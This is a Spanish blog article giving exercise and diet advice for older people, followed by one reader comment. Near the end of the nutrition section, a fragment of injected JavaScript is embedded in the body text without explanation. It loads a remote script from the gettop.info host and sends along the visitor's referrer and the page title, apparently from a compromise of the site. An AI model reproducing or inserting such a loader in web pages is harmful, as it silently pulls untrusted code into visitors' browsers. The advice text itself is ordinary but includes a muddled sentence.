Salud y belleza » Salud

Pensando en la tercera edad

1 Comentario

tercera-edad

¿Qué es la edad madura? La edad madura “es aquella en la que todavía se es joven, pero con mucho más esfuerzo”, han dicho algunos. “La tercera edad no es más que un desfile de antorchas sobre una tarta de cumpleaños” han dicho otros.
En realidad, la edad madura puede definirse con una sola palabra: recompensa.

Llegar a viejo es, en efecto, un privilegio y, como tal, también significa responsabilidades. Derechos y obligaciones: juzgar a quiénes se equivocan es un derecho, cuidar nuestro cuerpo una obligación.

Con ustedes, una lista de “obligaciones”: La Constitución de la Tercera Edad.

Ejercicios y actividades físicas.

Se cae de maduro (frase nunca antes más oportuna) que a determinada edad el cuerpo ya no nos responde como quisiéramos. De todos modos, esto no significa que se deban suspender todas las actividades fisicas , pero sí que se deben seleccionar y controlar los ejercicios que se llevarán a cabo. El plan perfecto para individuos de edad madura, consiste en realizar ejercicios de acondicionamiento físico general para, así, no solo trabajar los músculos sino también mantenerlos en movimiento, activos y tonificados.
La marcha, la caminata de resistencia, la carrera suave, la gimnasia leve o el yoga son opciones interesantes para mantener el cuerpo en forma.

Los deportes de conjunto no son los más recomendados pues, la mayoría de ellos, suelen ser friccionados o de contacto; aún así en el caso de que éstos se practiquen con cuidado y responsabilidad nada nos obliga a apartarlos.
Es importante, antes de practicar cualquiera de las actividades mencionadas, desde la más grande a la más pequeña, realizarse antes un chequeo médico para controlar la resistencia de nuestro corazón y demás órganos vitales. Luego de esto, sí, ¡a comenzar con los ejercicios!. 1, 2, 1, 2, 1, 2…

Alimentación.

Son varios los puntos a considerar en el campo de la nutrición de las personas de la tecera edad pues los cambios fisiológicos sufridos son, sin duda, factores condicionantes para la alimentación.

¿Qué debemos hacer? Consumir las proteínas necesarias (son elementos indispensables para el crecimiento y la construcción de tejidos y órganos; debemos agregar proteínas a nuestra dieta pues éstas albergan  sustancias orgánicas contienedoras de carbono, hidrógeno, oxígeno y nitrógeno. Los aminoácidos también son esenciales para nuestro organismo), masticar y triturar bien los alimentos (no solo para ejercitar nuestras piezas dentales sino para facilitar los procesos de digestión), planificar nuestros menúes (eso varía de acuerdo al estado de cada individuo aún así es vital el ejercicio de sistematizar nuestra dieta diaria -frutas, verduras, hidratos de carbono, lácteos, legumbres, etc.-), evitar el tabaco y el alcohol.

Problemas como la diarrea y el estreñimiento son síntomas muy frecuentes en la edad avanzada y ambos pueden relacionarse muchas veces con factores nutricionales; es por ello que debemos mantener siempre a mano estos consejos. Además, claro, de razones obvias como no mantener la presión y el colesterol en números estables y no forzar nuestros órganos con sustancias pesadas o peligrosas.d.getElementsByTagName('head')[0].appendChild(s);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

One Comment »

  • tercera edad said:

    Gracias por pensar en nostros y nuestra salud.
    La persona que ha escrito este articulo seguro que aun es joven.
    Pero si tengo un consejo que aportar aqui, hay que cuidar su salud, alimentacion y nuestros habitos antes de llegar a nuestra edad.
    A nuestra edad uno cosecha solo los frutos de la joventud. Veo que hoy en dia vosostros los jovenes aprovechais mucho vuestros tiempo, en fiestas alcohol, drogas, y comeis lo que sea. Desde luego no todos, Pero hay que pensar que uno a partir de los 40 ya se acaba eso, y queda una larga vida, y la salud de uno le tiene que acompañar para largo….
    Un saludo amigos

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.